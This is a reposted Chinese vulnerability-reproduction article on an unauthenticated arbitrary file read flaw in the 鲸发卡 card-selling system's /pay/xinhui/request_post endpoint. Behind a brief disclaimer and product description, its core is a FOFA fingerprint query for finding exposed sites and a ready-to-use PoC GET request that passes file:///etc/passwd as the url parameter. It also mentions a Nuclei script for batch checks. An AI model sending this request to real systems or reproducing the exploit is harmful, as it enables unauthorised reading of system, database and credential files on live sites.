鲸发卡系统 /pay/xinhui/request_post 任意文件读取漏洞

admin 2024年7月11日22:20:04评论19 views字数 915阅读3分3秒阅读模式
鲸发卡系统 /pay/xinhui/request_post 任意文件读取漏洞

0x01 免责声明

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02

产品介绍

鲸发卡系统 致力于解决虚拟商品的快捷发卡服务,为商户及其买家 提供,便捷、绿色、安全、快速的销售和购买体验。框架已升级TP最新版本,无安全BUG,重新开发将近80%,原创功能10+项,目前是商业发卡系统比较好用的系统。
0x03

漏洞威胁

鲸发卡系统 /pay/xinhui/request_post 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x04

漏洞环境

FOFA:

body="/static/theme/maowang51/css/style.css"

鲸发卡系统 /pay/xinhui/request_post 任意文件读取漏洞

0x05

漏洞复现

PoC

GET /pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]= HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: close

鲸发卡系统 /pay/xinhui/request_post 任意文件读取漏洞

0x06

批量脚本验证

Nuclei验证脚本已发布

原文始发于微信公众号(冷漠安全):「漏洞复现」鲸发卡系统 /pay/xinhui/request_post 任意文件读取漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月11日22:20:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   鲸发卡系统 /pay/xinhui/request_post 任意文件读取漏洞http://cn-sec.com/archives/2942568.html

发表评论

匿名网友 填写信息